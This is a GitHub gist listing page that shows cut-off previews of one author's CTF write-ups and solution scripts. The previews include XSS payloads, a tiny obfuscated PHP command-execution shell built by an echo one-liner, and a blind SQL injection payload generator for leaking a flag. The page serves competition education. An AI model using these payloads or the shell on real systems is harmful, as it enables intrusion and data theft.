terjanq /
Last active Jun 18, 2022
A TL;DR solution to Security Driven by @terjanq

For this year's Google CTF, I prepared a challenge that is based on a real-world vulnerability. The challenge wasn't solved by any team during the competition so here is the proof that the challenge was in fact solvable! :)

The goal of the challenge was to send a malicious file to the admin and leak their file with a flag. The ID of the file was embedded into the challenge description (/file?id=133711377731) and only the admin had access to it, because the file was private.

Disclaimer: The write-up was written on an airplane, therefore its quality is poor; it is mostly meant to showcase the required steps to solve the challenge.

terjanq /
Last active May 20, 2021
Politer Note - writeup



<a id=bad1 href='cid:="</div">'>
<a id=good1 href="cid:></script><iframe srcdoc='$'">

<a id=bad2 href="">
<a id=good2 href='data:,alert(/greetings from terjanq/)"></script>'>
terjanq /
Last active Oct 23, 2021
TokyoWesterns CTF 2020 | writeups by @terjanq

Urlcheck v1 (98 points, 160 solves)

The goal was to bypass WAF protection to access local resources.

app.re_ip = re.compile('\A(\d+)\.(\d+)\.(\d+)\.(\d+)\Z')

def valid_ip(ip):
 matches = app.re_ip.match(ip)
terjanq / scriptless_solve.html
Last active Jun 13, 2020
Solution to Scriptless challenge from Pwn2win 2020 CTF
Quasi-scriptless (3 solves)
terjanq / rev_shell.php
Last active Mar 17, 2022
The shortest non-alphanumeric reverse shell script (19 bytes)
* In terminal:
* $ echo -ne '<?=`{${~\xa0\xb8\xba\xab}[\xa0]}`;' > rev_shell.php
* This is how the code will be produced, \xa0\xb8\xba\xab will be
* treated as constant therefore no " needed. It is also not copyable
* string because of non-ascii characters
* Explanation:
View funny.php
/* system(id) */
- Some of the characters might look like alphanumeric, but they are Unicode characters.
- 'ArrayΦ' <-> [].Φ
- 1 <-> ![]
- 'a' <-> ([].Φ)[![]+![]+![]]
terjanq /
Last active Apr 20, 2020
Stegasaurus Scratch solution (PlaidCTF 2020)
# The solution comes from the paper
# Which I got from p4 team.
import random
from math import factorial
MAX_VAL = 40000
# get random 8 integers
terjanq /
Created Dec 29, 2019
Payload to WriteupBin hxp2019 CTF
from flask import Flask
import time
import requests
import os
import re
import sys
app = Flask(__name__)
terjanq / car_repair.js
Created Oct 24, 2019
Solutions from hacklu 2019 CTF
* This is a solution to "Car repair shop" challenge from ctf 2019
* Solves: 9
* 10/23/2019 © by terjanq
/* The idea of the solution is: */
function WoW(){ this.Oo = 'O.o'; }
var x = new WoW();
terjanq / exploit.js
Last active Jan 12, 2020
This is a solution of Oracle v2 and Oracle v1 from (I realized I could use <meta> and redirect admin to my website and run the challenge in iframes after I already solved it with bruteforcing the admin :p)
const fetch = require('node-fetch');
var flag = 'nn9ed{'
var alph = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!().{}'
var escape = d => d.replace(/\\/g, '\\\\').replace(/\./g, '\\.').replace(/\(/g, '\\(').replace(/\)/g, '\\)').replace(/\{/g, '\\{').replace(/\}/g, '\\}');
var make_payload = (i, o) => `Season 6%' AND 1=IF(ORD(SUBSTR(flag,${i},1))=${o},1,EXP(44444)) #` // throws an exception if the character of flag is incorrect
const base_url = ''
// Generates definitions for fonts
function generateFonts() {